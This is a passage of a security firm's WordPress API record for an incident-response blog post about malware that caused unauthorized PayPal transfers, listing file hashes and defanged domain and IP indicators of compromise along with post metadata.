class=\"wp-block-paragraph\">a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217&nbsp;<br>7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1&nbsp;<br>3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a&nbsp;<br>40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52&nbsp;<br>3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Network-based artifacts&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Domains<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a  href=\"https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>IP addresses<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">43.156.63[.]124&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alertness and vigilance are crucial in cybersecurity. When repeating this truism, most of us think about social engineering attacks and educating the user how to recognize a phishing mail or a scam call. However, an attentive user can also provide valuable insights on a more technical aspect.\u00a0<\/p>\n<p>A recent incident response case was started, when the user noticed \u201estrange black windows\u201d on the desktop and took screenshots of them. This was accompanied by PayPal transfers from the user\u2019s account, not authorized by the user.<\/p>\n","protected":false},"author":41,"featured_media":64098,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[86,81],"tags":[],"dpc_coauthors":[],"class_list":["post-64051","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-incident-response","category-techtalk"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/64051","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/users\/41"}],"replies":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/comments?post=64051"}],"version-history":[{"count":4,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/64051\/revisions"}],"predecessor-version":[{"id":64100,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/64051\/revisions\/64100"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/media\/64098"}],"wp:attachment":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/media?parent=64051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/categories?post=64051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/tags?post=64051"},{"taxonomy":"dpc_coauthors","embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/dpc_coauthors?post=64051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}